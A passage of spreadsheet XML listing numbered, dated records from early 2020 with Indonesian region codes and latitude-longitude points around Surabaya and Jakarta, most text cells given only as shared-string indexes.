    <row r="423" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A423">
        <v>102093</v>
      </c>
      <c r="B423" s="1">
        <v>43861</v>
      </c>
      <c r="C423" s="2">
        <v>0.54166666666666663</v>
      </c>
      <c r="D423" t="s">
        <v>22</v>
      </c>
      <c r="E423" t="s">
        <v>23</v>
      </c>
      <c r="F423" t="s">
        <v>1924</v>
      </c>
      <c r="H423" t="s">
        <v>26</v>
      </c>
      <c r="I423" t="s">
        <v>1559</v>
      </c>
      <c r="J423" t="s">
        <v>1342</v>
      </c>
      <c r="L423" t="s">
        <v>1925</v>
      </c>
      <c r="M423">
        <v>3515140001</v>
      </c>
      <c r="N423">
        <v>3515140</v>
      </c>
      <c r="O423">
        <v>3515</v>
      </c>
      <c r="P423">
        <v>35</v>
      </c>
      <c r="Q423" t="s">
        <v>1926</v>
      </c>
      <c r="R423" t="s">
        <v>1927</v>
      </c>
      <c r="S423" t="s">
        <v>1928</v>
      </c>
      <c r="T423" t="s">
        <v>1221</v>
      </c>
      <c r="U423" s="5">
        <v>11272221</v>
      </c>
      <c r="V423" s="5" t="s">
        <v>14843</v>
      </c>
      <c r="W423" s="5">
        <v>-735355</v>
      </c>
      <c r="X423" t="s">
        <v>18652</v>
      </c>
      <c r="Y423" t="str">
        <f t="shared" si="6"/>
        <v>-7.35355,112.72221</v>
      </c>
    </row>
    <row r="424" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A424">
        <v>102094</v>
      </c>
      <c r="B424" s="1">
        <v>43861</v>
      </c>
      <c r="C424" s="2">
        <v>0.55708333333333326</v>
      </c>
      <c r="D424" t="s">
        <v>22</v>
      </c>
      <c r="E424" t="s">
        <v>23</v>
      </c>
      <c r="F424" t="s">
        <v>1929</v>
      </c>
      <c r="G424" t="s">
        <v>1930</v>
      </c>
      <c r="H424" t="s">
        <v>26</v>
      </c>
      <c r="I424" t="s">
        <v>1359</v>
      </c>
      <c r="J424" t="s">
        <v>1342</v>
      </c>
      <c r="M424">
        <v>3578030004</v>
      </c>
      <c r="N424">
        <v>3578030</v>
      </c>
      <c r="O424">
        <v>3578</v>
      </c>
      <c r="P424">
        <v>35</v>
      </c>
      <c r="Q424" t="s">
        <v>1931</v>
      </c>
      <c r="R424" t="s">
        <v>1932</v>
      </c>
      <c r="S424" t="s">
        <v>1346</v>
      </c>
      <c r="T424" t="s">
        <v>1221</v>
      </c>
      <c r="U424" s="5">
        <v>11273031</v>
      </c>
      <c r="V424" s="5" t="s">
        <v>14844</v>
      </c>
      <c r="W424" s="5">
        <v>-731707</v>
      </c>
      <c r="X424" t="s">
        <v>18653</v>
      </c>
      <c r="Y424" t="str">
        <f t="shared" si="6"/>
        <v>-7.31707,112.73031</v>
      </c>
    </row>
    <row r="425" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A425">
        <v>102095</v>
      </c>
      <c r="B425" s="1">
        <v>43861</v>
      </c>
      <c r="C425" s="2">
        <v>0.55920138888888882</v>
      </c>
      <c r="D425" t="s">
        <v>22</v>
      </c>
      <c r="E425" t="s">
        <v>23</v>
      </c>
      <c r="F425" t="s">
        <v>1933</v>
      </c>
      <c r="G425" t="s">
        <v>1934</v>
      </c>
      <c r="H425" t="s">
        <v>26</v>
      </c>
      <c r="I425" t="s">
        <v>1194</v>
      </c>
      <c r="J425" t="s">
        <v>1342</v>
      </c>
      <c r="L425" t="s">
        <v>1935</v>
      </c>
      <c r="M425">
        <v>3578110004</v>
      </c>
      <c r="N425">
        <v>3578110</v>
      </c>
      <c r="O425">
        <v>3578</v>
      </c>
      <c r="P425">
        <v>35</v>
      </c>
      <c r="Q425" t="s">
        <v>1911</v>
      </c>
      <c r="R425" t="s">
        <v>1894</v>
      </c>
      <c r="S425" t="s">
        <v>1346</v>
      </c>
      <c r="T425" t="s">
        <v>1221</v>
      </c>
      <c r="U425" s="5">
        <v>11274495</v>
      </c>
      <c r="V425" s="5" t="s">
        <v>14845</v>
      </c>
      <c r="W425" s="5">
        <v>-729644</v>
      </c>
      <c r="X425" t="s">
        <v>18654</v>
      </c>
      <c r="Y425" t="str">
        <f t="shared" si="6"/>
        <v>-7.29644,112.74495</v>
      </c>
    </row>
    <row r="426" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A426">
        <v>102096</v>
      </c>
      <c r="B426" s="1">
        <v>43861</v>
      </c>
      <c r="C426" s="2">
        <v>0.59513888888888888</v>
      </c>
      <c r="D426" t="s">
        <v>22</v>
      </c>
      <c r="E426" t="s">
        <v>23</v>
      </c>
      <c r="F426" t="s">
        <v>1936</v>
      </c>
      <c r="G426" t="s">
        <v>1937</v>
      </c>
      <c r="H426" t="s">
        <v>26</v>
      </c>
      <c r="I426" t="s">
        <v>882</v>
      </c>
      <c r="J426" t="s">
        <v>1342</v>
      </c>
      <c r="M426">
        <v>3578120003</v>
      </c>
      <c r="N426">
        <v>3578120</v>
      </c>
      <c r="O426">
        <v>3578</v>
      </c>
      <c r="P426">
        <v>35</v>
      </c>
      <c r="Q426" t="s">
        <v>1938</v>
      </c>
      <c r="R426" t="s">
        <v>1939</v>
      </c>
      <c r="S426" t="s">
        <v>1346</v>
      </c>
      <c r="T426" t="s">
        <v>1221</v>
      </c>
      <c r="U426" s="5">
        <v>11269603</v>
      </c>
      <c r="V426" s="5" t="s">
        <v>14846</v>
      </c>
      <c r="W426" s="5">
        <v>-728526</v>
      </c>
      <c r="X426" t="s">
        <v>18655</v>
      </c>
      <c r="Y426" t="str">
        <f t="shared" si="6"/>
        <v>-7.28526,112.69603</v>
      </c>
    </row>
    <row r="427" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A427">
        <v>102097</v>
      </c>
      <c r="B427" s="1">
        <v>43861</v>
      </c>
      <c r="C427" s="2">
        <v>0.59797453703703707</v>
      </c>
      <c r="D427" t="s">
        <v>22</v>
      </c>
      <c r="E427" t="s">
        <v>23</v>
      </c>
      <c r="F427" t="s">
        <v>1940</v>
      </c>
      <c r="H427" t="s">
        <v>26</v>
      </c>
      <c r="I427" t="s">
        <v>1538</v>
      </c>
      <c r="J427" t="s">
        <v>1342</v>
      </c>
      <c r="L427" t="s">
        <v>1941</v>
      </c>
      <c r="M427">
        <v>3578100003</v>
      </c>
      <c r="N427">
        <v>3578100</v>
      </c>
      <c r="O427">
        <v>3578</v>
      </c>
      <c r="P427">
        <v>35</v>
      </c>
      <c r="Q427" t="s">
        <v>1942</v>
      </c>
      <c r="R427" t="s">
        <v>1545</v>
      </c>
      <c r="S427" t="s">
        <v>1346</v>
      </c>
      <c r="T427" t="s">
        <v>1221</v>
      </c>
      <c r="U427" s="5">
        <v>11275579</v>
      </c>
      <c r="V427" s="5" t="s">
        <v>14847</v>
      </c>
      <c r="W427" s="5">
        <v>-728000</v>
      </c>
      <c r="X427" t="s">
        <v>18656</v>
      </c>
      <c r="Y427" t="str">
        <f t="shared" si="6"/>
        <v>-7.28000,112.75579</v>
      </c>
    </row>
    <row r="428" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A428">
        <v>102098</v>
      </c>
      <c r="B428" s="1">
        <v>43861</v>
      </c>
      <c r="C428" s="2">
        <v>0.61989583333333331</v>
      </c>
      <c r="D428" t="s">
        <v>22</v>
      </c>
      <c r="E428" t="s">
        <v>23</v>
      </c>
      <c r="F428" t="s">
        <v>1943</v>
      </c>
      <c r="G428" t="s">
        <v>1944</v>
      </c>
      <c r="H428" t="s">
        <v>26</v>
      </c>
      <c r="I428" t="s">
        <v>592</v>
      </c>
      <c r="J428" t="s">
        <v>1342</v>
      </c>
      <c r="M428">
        <v>3578110002</v>
      </c>
      <c r="N428">
        <v>3578110</v>
      </c>
      <c r="O428">
        <v>3578</v>
      </c>
      <c r="P428">
        <v>35</v>
      </c>
      <c r="Q428" t="s">
        <v>1894</v>
      </c>
      <c r="R428" t="s">
        <v>1894</v>
      </c>
      <c r="S428" t="s">
        <v>1346</v>
      </c>
      <c r="T428" t="s">
        <v>1221</v>
      </c>
      <c r="U428" s="5">
        <v>11273325</v>
      </c>
      <c r="V428" s="5" t="s">
        <v>14848</v>
      </c>
      <c r="W428" s="5">
        <v>-730616</v>
      </c>
      <c r="X428" t="s">
        <v>18657</v>
      </c>
      <c r="Y428" t="str">
        <f t="shared" si="6"/>
        <v>-7.30616,112.73325</v>
      </c>
    </row>
    <row r="429" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A429">
        <v>102099</v>
      </c>
      <c r="B429" s="1">
        <v>43861</v>
      </c>
      <c r="C429" s="2">
        <v>0.63107638888888895</v>
      </c>
      <c r="D429" t="s">
        <v>22</v>
      </c>
      <c r="E429" t="s">
        <v>23</v>
      </c>
      <c r="F429" t="s">
        <v>1945</v>
      </c>
      <c r="H429" t="s">
        <v>26</v>
      </c>
      <c r="I429" t="s">
        <v>72</v>
      </c>
      <c r="J429" t="s">
        <v>1342</v>
      </c>
      <c r="L429" t="s">
        <v>1946</v>
      </c>
      <c r="M429">
        <v>3578100001</v>
      </c>
      <c r="N429">
        <v>3578100</v>
      </c>
      <c r="O429">
        <v>3578</v>
      </c>
      <c r="P429">
        <v>35</v>
      </c>
      <c r="Q429" t="s">
        <v>1918</v>
      </c>
      <c r="R429" t="s">
        <v>1545</v>
      </c>
      <c r="S429" t="s">
        <v>1346</v>
      </c>
      <c r="T429" t="s">
        <v>1221</v>
      </c>
      <c r="U429" s="5">
        <v>11276004</v>
      </c>
      <c r="V429" s="5" t="s">
        <v>14849</v>
      </c>
      <c r="W429" s="5">
        <v>-729128</v>
      </c>
      <c r="X429" t="s">
        <v>18658</v>
      </c>
      <c r="Y429" t="str">
        <f t="shared" si="6"/>
        <v>-7.29128,112.76004</v>
      </c>
    </row>
    <row r="430" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A430">
        <v>102100</v>
      </c>
      <c r="B430" s="1">
        <v>43861</v>
      </c>
      <c r="C430" s="2">
        <v>0.67390046296296291</v>
      </c>
      <c r="D430" t="s">
        <v>22</v>
      </c>
      <c r="E430" t="s">
        <v>23</v>
      </c>
      <c r="F430" t="s">
        <v>1947</v>
      </c>
      <c r="H430" t="s">
        <v>26</v>
      </c>
      <c r="I430" t="s">
        <v>1538</v>
      </c>
      <c r="J430" t="s">
        <v>1342</v>
      </c>
      <c r="L430" t="s">
        <v>1948</v>
      </c>
      <c r="M430">
        <v>3578110002</v>
      </c>
      <c r="N430">
        <v>3578110</v>
      </c>
      <c r="O430">
        <v>3578</v>
      </c>
      <c r="P430">
        <v>35</v>
      </c>
      <c r="Q430" t="s">
        <v>1894</v>
      </c>
      <c r="R430" t="s">
        <v>1894</v>
      </c>
      <c r="S430" t="s">
        <v>1346</v>
      </c>
      <c r="T430" t="s">
        <v>1221</v>
      </c>
      <c r="U430" s="5">
        <v>11273603</v>
      </c>
      <c r="V430" s="5" t="s">
        <v>14850</v>
      </c>
      <c r="W430" s="5">
        <v>-730560</v>
      </c>
      <c r="X430" t="s">
        <v>18659</v>
      </c>
      <c r="Y430" t="str">
        <f t="shared" si="6"/>
        <v>-7.30560,112.73603</v>
      </c>
    </row>
    <row r="431" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A431">
        <v>102101</v>
      </c>
      <c r="B431" s="1">
        <v>43861</v>
      </c>
      <c r="C431" s="2">
        <v>0.69015046296296301</v>
      </c>
      <c r="D431" t="s">
        <v>22</v>
      </c>
      <c r="E431" t="s">
        <v>23</v>
      </c>
      <c r="F431" t="s">
        <v>1949</v>
      </c>
      <c r="H431" t="s">
        <v>26</v>
      </c>
      <c r="I431" t="s">
        <v>1651</v>
      </c>
      <c r="J431" t="s">
        <v>1342</v>
      </c>
      <c r="L431" t="s">
        <v>1950</v>
      </c>
      <c r="M431">
        <v>3578030004</v>
      </c>
      <c r="N431">
        <v>3578030</v>
      </c>
      <c r="O431">
        <v>3578</v>
      </c>
      <c r="P431">
        <v>35</v>
      </c>
      <c r="Q431" t="s">
        <v>1931</v>
      </c>
      <c r="R431" t="s">
        <v>1932</v>
      </c>
      <c r="S431" t="s">
        <v>1346</v>
      </c>
      <c r="T431" t="s">
        <v>1221</v>
      </c>
      <c r="U431" s="5">
        <v>11272685</v>
      </c>
      <c r="V431" s="5" t="s">
        <v>14851</v>
      </c>
      <c r="W431" s="5">
        <v>-731736</v>
      </c>
      <c r="X431" t="s">
        <v>18660</v>
      </c>
      <c r="Y431" t="str">
        <f t="shared" si="6"/>
        <v>-7.31736,112.72685</v>
      </c>
    </row>
    <row r="432" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A432">
        <v>102102</v>
      </c>
      <c r="B432" s="1">
        <v>43862</v>
      </c>
      <c r="C432">
        <v>0</v>
      </c>
      <c r="D432" t="s">
        <v>22</v>
      </c>
      <c r="E432" t="s">
        <v>23</v>
      </c>
      <c r="F432" t="s">
        <v>1951</v>
      </c>
      <c r="G432" t="s">
        <v>1952</v>
      </c>
      <c r="H432" t="s">
        <v>26</v>
      </c>
      <c r="I432" t="s">
        <v>1953</v>
      </c>
      <c r="J432" t="s">
        <v>1342</v>
      </c>
      <c r="L432" t="s">
        <v>1954</v>
      </c>
      <c r="M432">
        <v>3578110003</v>
      </c>
      <c r="N432">
        <v>3578110</v>
      </c>
      <c r="O432">
        <v>3578</v>
      </c>
      <c r="P432">
        <v>35</v>
      </c>
      <c r="Q432" t="s">
        <v>1921</v>
      </c>
      <c r="R432" t="s">
        <v>1894</v>
      </c>
      <c r="S432" t="s">
        <v>1346</v>
      </c>
      <c r="T432" t="s">
        <v>1221</v>
      </c>
      <c r="U432" s="5">
        <v>11273672</v>
      </c>
      <c r="V432" s="5" t="s">
        <v>14852</v>
      </c>
      <c r="W432" s="5">
        <v>-730339</v>
      </c>
      <c r="X432" t="s">
        <v>18661</v>
      </c>
      <c r="Y432" t="str">
        <f t="shared" si="6"/>
        <v>-7.30339,112.73672</v>
      </c>
    </row>
    <row r="433" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A433">
        <v>102103</v>
      </c>
      <c r="B433" s="1">
        <v>43862</v>
      </c>
      <c r="C433">
        <v>0</v>
      </c>
      <c r="D433" t="s">
        <v>22</v>
      </c>
      <c r="E433" t="s">
        <v>23</v>
      </c>
      <c r="F433" t="s">
        <v>1955</v>
      </c>
      <c r="G433" t="s">
        <v>1956</v>
      </c>
      <c r="H433" t="s">
        <v>26</v>
      </c>
      <c r="I433" t="s">
        <v>137</v>
      </c>
      <c r="J433" t="s">
        <v>1380</v>
      </c>
      <c r="L433" t="s">
        <v>1957</v>
      </c>
      <c r="M433">
        <v>3174070002</v>
      </c>
      <c r="N433">
        <v>3174070</v>
      </c>
      <c r="O433">
        <v>3174</v>
      </c>
      <c r="P433">
        <v>31</v>
      </c>
      <c r="Q433" t="s">
        <v>621</v>
      </c>
      <c r="R433" t="s">
        <v>84</v>
      </c>
      <c r="S433" t="s">
        <v>32</v>
      </c>
      <c r="T433" t="s">
        <v>33</v>
      </c>
      <c r="U433" s="5">
        <v>10674222</v>
      </c>
      <c r="V433" s="5" t="s">
        <v>14853</v>
      </c>
      <c r="W433" s="5">
        <v>-615669</v>
      </c>
      <c r="X433" t="s">
        <v>18662</v>
      </c>
      <c r="Y433" t="str">
        <f t="shared" si="6"/>
        <v>-6.15669,106.74222</v>
      </c>
    </row>
    <row r="434" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A434">
        <v>102104</v>
      </c>
      <c r="B434" s="1">
        <v>43862</v>
      </c>
      <c r="C434">
        <v>0</v>
      </c>
      <c r="D434" t="s">
        <v>22</v>
      </c>
      <c r="E434" t="s">
        <v>23</v>
      </c>
      <c r="F434" t="s">
        <v>1958</v>
      </c>
      <c r="H434" t="s">
        <v>26</v>
      </c>
      <c r="I434" t="s">
        <v>1891</v>
      </c>
      <c r="J434" t="s">
        <v>37</v>
      </c>
      <c r="L434" t="s">
        <v>1959</v>
      </c>
      <c r="M434">
        <v>3671060002</v>
      </c>
      <c r="N434">
        <v>3671060</v>
      </c>
      <c r="O434">
        <v>3671</v>
      </c>
      <c r="P434">
        <v>36</v>
      </c>
      <c r="Q434" t="s">
        <v>1960</v>
      </c>
      <c r="R434" t="s">
        <v>1961</v>
      </c>
      <c r="S434" t="s">
        <v>201</v>
      </c>
      <c r="T434" t="s">
        <v>171</v>
      </c>
      <c r="U434" s="5">
        <v>10668544</v>
      </c>
      <c r="V434" s="5" t="s">
        <v>14854</v>
      </c>
      <c r="W434" s="5">
        <v>-614892</v>
      </c>
      <c r="X434" t="s">
        <v>18663</v>
      </c>
      <c r="Y434" t="str">
        <f t="shared" si="6"/>
        <v>-6.14892,106.68544</v>
      </c>
    </row>
    <row r="435" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A435">
        <v>102105</v>
      </c>
      <c r="B435" s="1">
        <v>43862</v>
      </c>
      <c r="C435">
        <v>1</v>
      </c>
      <c r="D435" t="s">
        <v>22</v>
      </c>
      <c r="E435" t="s">
        <v>23</v>
      </c>
      <c r="F435" t="s">
        <v>1962</v>
      </c>
      <c r="H435" t="s">
        <v>26</v>
      </c>
      <c r="I435" t="s">
        <v>974</v>
      </c>
      <c r="J435" t="s">
        <v>1342</v>
      </c>
      <c r="L435" t="s">
        <v>1963</v>
      </c>
      <c r="M435">
        <v>3578160006</v>
      </c>
      <c r="N435">
        <v>3578160</v>
      </c>
      <c r="O435">
        <v>3578</v>
      </c>
      <c r="P435">
        <v>35</v>
      </c>
      <c r="Q435" t="s">
        <v>1964</v>
      </c>
      <c r="R435" t="s">
        <v>1884</v>
      </c>
      <c r="S435" t="s">
        <v>1346</v>
      </c>
      <c r="T435" t="s">
        <v>1221</v>
      </c>
      <c r="U435" s="5">
        <v>11271060</v>
      </c>
      <c r="V435" s="5" t="s">
        <v>14855</v>
      </c>
      <c r="W435" s="5">
        <v>-726003</v>
      </c>
      <c r="X435" t="s">
        <v>18664</v>
      </c>
      <c r="Y435" t="str">
        <f t="shared" si="6"/>
        <v>-7.26003,112.71060</v>
      </c>
    </row>
    <row r="436" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A436">
        <v>102106</v>
      </c>
      <c r="B436" s="1">
        <v>43862</v>
      </c>
      <c r="C436">
        <v>1</v>
      </c>
      <c r="D436" t="s">
        <v>22</v>
      </c>
      <c r="E436" t="s">
        <v>23</v>
      </c>
      <c r="F436" t="s">
        <v>1965</v>
      </c>
      <c r="H436" t="s">
        <v>26</v>
      </c>
      <c r="I436" t="s">
        <v>511</v>
      </c>
      <c r="J436" t="s">
        <v>37</v>
      </c>
      <c r="L436" t="s">
        <v>1966</v>
      </c>
      <c r="M436">
        <v>3603200003</v>
      </c>
      <c r="N436">
        <v>3603200</v>
      </c>
      <c r="O436">
        <v>3603</v>
      </c>
      <c r="P436">
        <v>36</v>
      </c>
      <c r="Q436" t="s">
        <v>1967</v>
      </c>
      <c r="R436" t="s">
        <v>1968</v>
      </c>
      <c r="S436" t="s">
        <v>201</v>
      </c>
      <c r="T436" t="s">
        <v>171</v>
      </c>
      <c r="U436" s="5">
        <v>10663834</v>
      </c>
      <c r="V436" s="5" t="s">
        <v>14856</v>
      </c>
      <c r="W436" s="5">
        <v>-609733</v>
      </c>
      <c r="X436" t="s">
        <v>18665</v>
      </c>
      <c r="Y436" t="str">
        <f t="shared" si="6"/>
        <v>-6.09733,106.63834</v>
      </c>
    </row>
    <row r="437" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A437">
        <v>102107</v>
      </c>
      <c r="B437" s="1">
        <v>43862</v>
      </c>
      <c r="C437">
        <v>1</v>
      </c>
      <c r="D437" t="s">
        <v>22</v>
      </c>
      <c r="E437" t="s">
        <v>23</v>
      </c>
      <c r="F437" t="s">
        <v>1969</v>
      </c>
      <c r="G437" t="s">
        <v>1970</v>
      </c>
      <c r="H437" t="s">
        <v>26</v>
      </c>
      <c r="I437" t="s">
        <v>1971</v>
      </c>
      <c r="J437" t="s">
        <v>1342</v>
      </c>
      <c r="L437" t="s">
        <v>1972</v>
      </c>
      <c r="M437">
        <v>3578160003</v>
      </c>
      <c r="N437">
        <v>3578160</v>
      </c>
      <c r="O437">
        <v>3578</v>
      </c>
      <c r="P437">
        <v>35</v>
      </c>
      <c r="Q437" t="s">
        <v>1883</v>
      </c>
      <c r="R437" t="s">
        <v>1884</v>
      </c>
      <c r="S437" t="s">
        <v>1346</v>
      </c>
      <c r="T437" t="s">
        <v>1221</v>
      </c>
      <c r="U437" s="5">
        <v>11270146</v>
      </c>
      <c r="V437" s="5" t="s">
        <v>14857</v>
      </c>
      <c r="W437" s="5">
        <v>-726865</v>
      </c>
      <c r="X437" t="s">
        <v>18666</v>
      </c>
      <c r="Y437" t="str">
        <f t="shared" si="6"/>
        <v>-7.26865,112.70146</v>
      </c>
    </row>
    <row r="438" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A438">
        <v>102108</v>
      </c>
      <c r="B438" s="1">
        <v>43862</v>
      </c>
      <c r="C438">
        <v>1</v>
      </c>
      <c r="D438" t="s">
        <v>22</v>
      </c>
      <c r="E438" t="s">
        <v>23</v>
      </c>
      <c r="F438" t="s">
        <v>1973</v>
      </c>
      <c r="G438" t="s">
        <v>1974</v>
      </c>
      <c r="H438" t="s">
        <v>26</v>
      </c>
      <c r="I438" t="s">
        <v>271</v>
      </c>
      <c r="J438" t="s">
        <v>1342</v>
      </c>
      <c r="L438" t="s">
        <v>1975</v>
      </c>
      <c r="M438">
        <v>3578190002</v>
      </c>
      <c r="N438">
        <v>3578190</v>
      </c>
      <c r="O438">
        <v>3578</v>
      </c>
      <c r="P438">
        <v>35</v>
      </c>
      <c r="Q438" t="s">
        <v>1976</v>
      </c>
      <c r="R438" t="s">
        <v>1345</v>
      </c>
      <c r="S438" t="s">
        <v>1346</v>
      </c>
      <c r="T438" t="s">
        <v>1221</v>
      </c>
      <c r="U438" s="5">
        <v>11275210</v>
      </c>
      <c r="V438" s="5" t="s">
        <v>14858</v>
      </c>
      <c r="W438" s="5">
        <v>-725750</v>
      </c>
      <c r="X438" t="s">
        <v>18667</v>
      </c>
      <c r="Y438" t="str">
        <f t="shared" si="6"/>
        <v>-7.25750,112.75210</v>
      </c>
    </row>
    <row r="439" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A439">
        <v>102109</v>
      </c>
      <c r="B439" s="1">
        <v>43862</v>
      </c>
      <c r="C439">
        <v>1</v>
      </c>
      <c r="D439" t="s">
        <v>22</v>
      </c>
      <c r="E439" t="s">
        <v>23</v>
      </c>
      <c r="F439" t="s">
        <v>1977</v>
      </c>
      <c r="H439" t="s">
        <v>26</v>
      </c>
      <c r="I439" t="s">
        <v>1359</v>
      </c>
      <c r="J439" t="s">
        <v>1694</v>
      </c>
      <c r="L439" t="s">
        <v>1978</v>
      </c>
      <c r="M439">
        <v>3174080004</v>
      </c>
      <c r="N439">
        <v>3174080</v>
      </c>
      <c r="O439">
        <v>3174</v>
      </c>
      <c r="P439">
        <v>31</v>
      </c>
      <c r="Q439" t="s">
        <v>1696</v>
      </c>
      <c r="R439" t="s">
        <v>695</v>
      </c>
      <c r="S439" t="s">
        <v>32</v>
      </c>
      <c r="T439" t="s">
        <v>33</v>
      </c>
      <c r="U439" s="5">
        <v>10671176</v>
      </c>
      <c r="V439" s="5" t="s">
        <v>14859</v>
      </c>
      <c r="W439" s="5">
        <v>-611354</v>
      </c>
      <c r="X439" t="s">
        <v>18668</v>
      </c>
      <c r="Y439" t="str">
        <f t="shared" si="6"/>
        <v>-6.11354,106.71176</v>
      </c>
    </row>
    <row r="440" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A440">
        <v>102110</v>
      </c>
      <c r="B440" s="1">
        <v>43862</v>
      </c>
      <c r="C440">
        <v>1</v>
      </c>
      <c r="D440" t="s">
        <v>85</v>
      </c>
      <c r="E440" t="s">
        <v>23</v>
      </c>
      <c r="F440" t="s">
        <v>1979</v>
      </c>
      <c r="G440" t="s">
        <v>1980</v>
      </c>
      <c r="H440" t="s">
        <v>26</v>
      </c>
      <c r="J440" t="s">
        <v>1128</v>
      </c>
      <c r="K440" t="s">
        <v>1981</v>
      </c>
      <c r="L440" t="s">
        <v>1982</v>
      </c>
      <c r="M440">
        <v>3577030005</v>
      </c>
      <c r="N440">
        <v>3577030</v>
      </c>
      <c r="O440">
        <v>3577</v>
      </c>
      <c r="P440">
        <v>35</v>
      </c>
      <c r="Q440" t="s">
        <v>1983</v>
      </c>
      <c r="R440" t="s">
        <v>1219</v>
      </c>
      <c r="S440" t="s">
        <v>1220</v>
      </c>
      <c r="T440" t="s">
        <v>1221</v>
      </c>
      <c r="U440" s="5">
        <v>11155546</v>
      </c>
      <c r="V440" s="5" t="s">
        <v>14860</v>
      </c>
      <c r="W440" s="5">
        <v>-760434</v>
      </c>
      <c r="X440" t="s">
        <v>18669</v>
      </c>
      <c r="Y440" t="str">
        <f t="shared" si="6"/>
        <v>-7.60434,111.55546</v>
      </c>
    </row>
    <row r="441" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A441">
        <v>102111</v>
      </c>
      <c r="B441" s="1">
        <v>43862</v>
      </c>
      <c r="C441">
        <v>1</v>
      </c>
      <c r="D441" t="s">
        <v>85</v>
      </c>
      <c r="E441" t="s">
        <v>23</v>
      </c>
      <c r="F441" t="s">
        <v>1984</v>
      </c>
      <c r="G441" t="s">
        <v>1985</v>
      </c>
      <c r="H441" t="s">
        <v>26</v>
      </c>
      <c r="J441" t="s">
        <v>1128</v>
      </c>
      <c r="K441" t="s">
        <v>1986</v>
      </c>
      <c r="L441" t="s">
        <v>1987</v>
      </c>
      <c r="M441">
        <v>3577030009</v>
      </c>
      <c r="N441">
        <v>3577030</v>
      </c>
      <c r="O441">
        <v>3577</v>
      </c>
      <c r="P441">
        <v>35</v>
      </c>
      <c r="Q441" t="s">
        <v>1988</v>
      </c>
      <c r="R441" t="s">
        <v>1219</v>
      </c>
      <c r="S441" t="s">
        <v>1220</v>
      </c>
      <c r="T441" t="s">
        <v>1221</v>
      </c>
      <c r="U441" s="5">
        <v>11155335</v>
      </c>
      <c r="V441" s="5" t="s">
        <v>14861</v>
      </c>
      <c r="W441" s="5">
        <v>-760490</v>
      </c>
      <c r="X441" t="s">
        <v>18670</v>
      </c>
      <c r="Y441" t="str">
        <f t="shared" si="6"/>
        <v>-7.60490,111.55335</v>
      </c>
    </row>
    <row r="442" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A442">
        <v>102112</v>
      </c>
      <c r="B442" s="1">
        <v>43863</v>
      </c>
      <c r="C442">
        <v>0</v>
      </c>
      <c r="D442" t="s">
        <v>22</v>
      </c>
      <c r="E442" t="s">
        <v>23</v>
      </c>
      <c r="F442" t="s">
        <v>1989</v>
      </c>
      <c r="G442" t="s">
        <v>1990</v>
      </c>
      <c r="H442" t="s">
        <v>26</v>
      </c>
      <c r="I442" t="s">
        <v>1991</v>
      </c>
      <c r="J442" t="s">
        <v>1572</v>
      </c>
      <c r="L442" t="s">
        <v>1992</v>
      </c>
      <c r="M442">
        <v>3175030001</v>
      </c>
      <c r="N442">
        <v>3175030</v>
      </c>
      <c r="O442">
        <v>3175</v>
      </c>
      <c r="P442">
        <v>31</v>
      </c>
      <c r="Q442" t="s">
        <v>1574</v>
      </c>
      <c r="R442" t="s">
        <v>1563</v>
      </c>
      <c r="S442" t="s">
        <v>547</v>
      </c>
      <c r="T442" t="s">
        <v>33</v>
      </c>
      <c r="U442" s="5">
        <v>10686036</v>
      </c>
      <c r="V442" s="5" t="s">
        <v>14862</v>
      </c>
      <c r="W442" s="5">
        <v>-613381</v>
      </c>
      <c r="X442" t="s">
        <v>18671</v>
      </c>
      <c r="Y442" t="str">
        <f t="shared" si="6"/>
        <v>-6.13381,106.86036</v>
      </c>
    </row>
    <row r="443" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A443">
        <v>102113</v>
      </c>
      <c r="B443" s="1">
        <v>43863</v>
      </c>
      <c r="C443">
        <v>0</v>
      </c>
      <c r="D443" t="s">
        <v>22</v>
      </c>
      <c r="E443" t="s">
        <v>23</v>
      </c>
      <c r="F443" t="s">
        <v>1993</v>
      </c>
      <c r="G443" t="s">
        <v>1994</v>
      </c>
      <c r="H443" t="s">
        <v>26</v>
      </c>
      <c r="I443" t="s">
        <v>1538</v>
      </c>
      <c r="J443" t="s">
        <v>1995</v>
      </c>
      <c r="L443" t="s">
        <v>1996</v>
      </c>
      <c r="M443">
        <v>3175030001</v>
      </c>
      <c r="N443">
        <v>3175030</v>
      </c>
      <c r="O443">
        <v>3175</v>
      </c>
      <c r="P443">
        <v>31</v>
      </c>
      <c r="Q443" t="s">
        <v>1574</v>
      </c>
      <c r="R443" t="s">
        <v>1563</v>
      </c>
      <c r="S443" t="s">
        <v>547</v>
      </c>
      <c r="T443" t="s">
        <v>33</v>
      </c>
      <c r="U443" s="5">
        <v>10687009</v>
      </c>
      <c r="V443" s="5" t="s">
        <v>14863</v>
      </c>
      <c r="W443" s="5">
        <v>-614110</v>
      </c>
      <c r="X443" t="s">
        <v>18672</v>
      </c>
      <c r="Y443" t="str">
        <f t="shared" si="6"/>
        <v>-6.14110,106.87009</v>
      </c>
    </row>
    <row r="444" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A444">
        <v>102114</v>
      </c>
      <c r="B444" s="1">
        <v>43863</v>
      </c>
      <c r="C444">
        <v>0</v>
      </c>
      <c r="D444" t="s">
        <v>22</v>
      </c>
      <c r="E444" t="s">
        <v>23</v>
      </c>
      <c r="F444" t="s">
        <v>1997</v>
      </c>
      <c r="G444" t="s">
        <v>1998</v>
      </c>
      <c r="H444" t="s">
        <v>26</v>
      </c>
      <c r="I444" t="s">
        <v>1538</v>
      </c>
      <c r="J444" t="s">
        <v>1572</v>
      </c>
